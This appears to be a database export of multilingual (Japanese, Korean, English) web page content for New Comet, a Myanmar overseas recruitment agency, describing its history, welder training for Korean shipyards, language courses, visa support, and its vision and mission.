('page', 0, 23, 306, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本、韓国など、への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_3.jpg\" data-align=\"center\" data-entity-uuid=\"20d75075-fb13-4332-9836-0cdbf49b8dfd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_4.jpg\" data-align=\"center\" data-entity-uuid=\"e7288834-ff3b-480c-9234-fc6593057fbd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_3.jpg\" data-align=\"center\" data-entity-uuid=\"03602aa7-45bb-4473-9c3d-d87c28205132\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_3.jpg\" data-align=\"center\" data-entity-uuid=\"189e39d2-6713-4114-942b-44bd26eec52f\" data-entity-type=\"file\"><img data-entity-uuid=\"fc1b0cae-8888-42ef-b289-eab7a62c114f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-7_3.jpg\" data-align=\"center\" data-entity-uuid=\"df47ee75-79b9-4616-81c0-0e34a78c90ef\" data-entity-type=\"file\"><img data-entity-uuid=\"f46df6c8-2062-4477-94ba-4f7bdcb72096\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"5a38eb75-558d-43dc-b395-6e85f75cfa9d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"a5fa3a82-69bd-4cad-8cce-a8e6cfdfaa4d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_6.jpg\" data-align=\"center\"><img data-entity-uuid=\"627e8ddc-1573-4932-a000-86f210583339\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_6.jpg\" data-align=\"center\"><img data-entity-uuid=\"816827e9-8b4f-4529-a4ef-3a9efd261c46\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_6.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img data-entity-uuid=\"26718e0e-5474-4cfe-a694-aa62fbfcb114\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img data-entity-uuid=\"56e3de67-e8a5-47c1-b147-c73010cfdc6d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_3.jpg\" data-align=\"center\" data-entity-uuid=\"4b011db5-14e8-4a56-a6da-e6fe90c2e0f3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 306, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.<br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.<br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.<br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.&nbsp;<br>또한, 두바이, 말레이시아, 싱가포르, 태국, 일본, 그리고 한국 등과 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 갖을 수 있도록 &nbsp;서비스를 제공하고 있습니다.<br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.<br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.<br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_4.jpg\" data-align=\"center\" data-entity-uuid=\"95208b24-3912-47cb-b94e-77132a3ec814\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_5.jpg\" data-align=\"center\" data-entity-uuid=\"e9bcdc81-0d00-49fb-9571-b8bc777f5fdb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_4.jpg\" data-align=\"center\" data-entity-uuid=\"faa757f4-ca65-4ec0-9775-5e338a7528c8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_4.jpg\" data-align=\"center\" data-entity-uuid=\"b3288e51-9e4d-4c06-9d79-c0c9d7e39b05\" data-entity-type=\"file\"><img data-entity-uuid=\"de4eda5d-37a9-4856-a8b3-8044aa5bead5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-7_4.jpg\" data-align=\"center\" data-entity-uuid=\"7d1d0387-7914-47da-aa48-a5999065485b\" data-entity-type=\"file\"><img data-entity-uuid=\"4607347b-1944-4d26-8b30-94e9f4e5a82b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_4.jpg\" data-align=\"center\"><img data-entity-uuid=\"a4d1fd76-c68d-4194-a623-938d24b3bd16\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_4.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"ef024d3d-96d2-4823-a89f-4692a221c33b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_7.jpg\"><img data-entity-uuid=\"cfd6906a-4acf-47fb-885b-f36864758ac6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_7.jpg\" data-align=\"center\"><img data-entity-uuid=\"ce255a1f-b721-4067-b86e-ccf178fe8351\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_7.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"4d275af6-df8e-43b3-9938-e8398c3fa877\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img data-entity-uuid=\"cc62c246-ae78-4d62-bfae-7e2e2193983c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_4.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_4.jpg\" data-align=\"center\" data-entity-uuid=\"be405527-a576-421a-af55-70724f3aed8b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 24, 413, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" data-align=\"center\" data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" width=\"100%\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>2. Co-opening and teaching Korean, Japanese, Thailand and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea and etc., we provide services to facilitate employment opportunities, if necessary, we connect with many courses such as computer training and basic English courses.</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p><img data-entity-uuid=\"a6dfcb06-87d0-4a8b-9799-cc92e249f5fa\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_6.jpg\" data-align=\"center\">', '', 'full_html'),
('page', 0, 24, 413, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_0.png\" data-entity-uuid=\"d0f4e5f0-d3b4-4a71-a4f7-e4dfd02c6e4f\" data-entity-type=\"file\" width=\"100%\"><p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校, タイ語学校, 英語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タイ、日本、韓国などで働きたい学生達のためにも英語など必要な場合に応じて、パソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビースをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\" data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p><img data-entity-uuid=\"d4276177-aa5b-4ee5-a82f-aad6b6aacba3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_5.jpg\">', '', 'full_html'),
('page', 0, 24, 413, 'ko', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_1.png\" data-align=\"center\" data-entity-uuid=\"e5deb7cf-45ee-4a4a-8dc7-90ebd6e964af\" data-entity-type=\"file\" width=\"100%\"><p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어, 일본어, 태국어, 영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국, 일본, 한국 등과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\" data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p><img data-entity-uuid=\"a3f87ad4-737d-4248-8c12-cedecd90d53a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_7.jpg\" data-align=\"center\">', '', 'full_html'),
('page', 0, 25, 287, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121922_1.png\" data-align=\"left\" data-entity-uuid=\"86bda383-6d52-4363-8c1e-a41e045b7dcd\" data-entity-type=\"file\" width=\"30.62%\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121902_0.png\" data-align=\"left\" data-entity-uuid=\"30569f4b-43d5-4996-906b-fbe307bd34e2\" data-entity-type=\"file\" width=\"29.72%\"><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 287, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121922_0.png\" data-align=\"left\" data-entity-uuid=\"0139e778-f800-4211-bab2-241a3161a010\" data-entity-type=\"file\" width=\"30.5%\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121902.png\" data-align=\"left\" data-entity-uuid=\"3b9565a8-e5ea-426b-927b-4ef6b8f0deb1\" data-entity-type=\"file\" width=\"30.39%\"><p class=\"MsoNormal\"><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 287, 'ko', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121922_2.png\" data-align=\"left\" data-entity-uuid=\"9f6e037e-9017-4275-8d18-3b626f1015e7\" data-entity-type=\"file\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun 